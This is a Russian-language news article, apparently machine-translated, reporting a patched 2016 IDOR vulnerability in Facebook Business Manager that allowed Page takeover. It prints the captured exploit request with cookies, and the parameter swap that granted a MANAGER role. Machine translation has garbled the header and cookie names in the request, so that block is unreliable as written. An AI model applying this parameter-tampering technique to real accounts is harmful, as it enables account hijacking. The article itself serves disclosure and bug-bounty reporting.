Взлом страниц Facebook? Хакеры продемонстрировали, как это сделать за 10 секунд

Взлом Facebook. Индийский исследователь обнаружил критическую уязвимость в бизнес-менеджере Facebook, которую можно использовать для взлома любой Страницы.

Индийский исследователь безопасности Арун Сурешкумар сообщил о критической уязвимости в бизнес-менеджере Facebook, которую злоумышленники могут использовать для взлома любой страницы Facebook.

Бизнес-менеджер — это компонент, который позволяет компаниям делиться и контролировать доступ к ресурсам на Facebook, включая страницы и рекламные аккаунты.

Facebook Business Manager также позволяет администраторам делиться доступом к Страницам и рекламным аккаунтам, не дружа с коллегами на Facebook.

Прежде чем анализировать технику, разработанную исследователем, позвольте мне представить вам концепцию небезопасной прямой ссылки на объект.

Согласно определению, предоставленному проектом OWASP, небезопасные прямые ссылки на объекты возникают, когда приложение предоставляет прямой доступ к объектам на основе введенных пользователем данных. В результате этой уязвимости злоумышленник может обойти авторизацию и напрямую получить доступ к ресурсам в системе.

«Небезопасные прямые ссылки на объекты позволяют злоумышленникам обходить авторизацию и получать доступ к ресурсам напрямую, изменяя значение параметра, используемого для прямого указания на объект. Такими ресурсами могут быть записи базы данных, принадлежащие другим пользователям, файлы в системе и многое другое. Это вызвано тем, что приложение принимает введенные пользователем данные и использует их для извлечения объекта, не выполняя достаточных проверок авторизации». читает OWASP.

Сурешкумар воспользовался уязвимостью IDOR в Facebook Business Manager, что позволило ему захватить любую страницу Facebook менее чем за 10 секунд.

Статья в тему: Что делать, если Facebook просит вас подтвердить свою личность

Сурешкумар использовал свой бизнес-аккаунт Facebook (ID = 907970555981524), чтобы добавить партнера. Он использовал в качестве партнера тестовую учетную запись с идентификатором 991079870975788.

Хакер использовал Burp Suite для захвата запроса с помощью Burp Suite, инструмент позволил ему изменить запрос.

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1 Хост: business.facebook.com Соединение: close Длина содержимого: 436 Происхождение: https://business.facebook.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, как Gecko) Chrome/52.0.2743.116 Safari/537.36 Тип содержимого: application/x-www-form-urlencoded Принять: */* Реферер: https://business.facebook. com/settings/pages/536195393199075?business_id=907970555981524 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; локаль=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; пл=н; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; см=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; р=-2; присутствие=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6 parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

Как насчет взлома Facebook? Как?

Он изменил ‘значение идентификатора актива с одной из целевых страниц для взлома, а также обменялись местами ‘parent_business_id’ значение с 'agency_id'. Он также изменил значение роли на «МЕНЕДЖЕР».

parent_business_id= 991079870975788 Agency_id= 907970555981524 assets_id =190313461381022 role= МЕНЕДЖЕР

С помощью этого простого трюка Сурешкумар продемонстрировал, что взлом страниц Facebook возможен. Он получил права администратора на бизнес-странице.

Сурешкумар также опубликовал видео PoC атаки.

Эксперт по безопасности сообщил об уязвимости в Facebook 29 августа 2016 года. Facebook изучил проблему и обнаружил еще одну уязвимость в своей платформе.

Гигант социальных сетей наградил Сурешкумара 16 000 долларов США в рамках своей программы вознаграждения за обнаружение ошибок.

(Вопросы безопасности – Взлом Facebook, социальной сети)

Статья в тему: Что купил Facebook?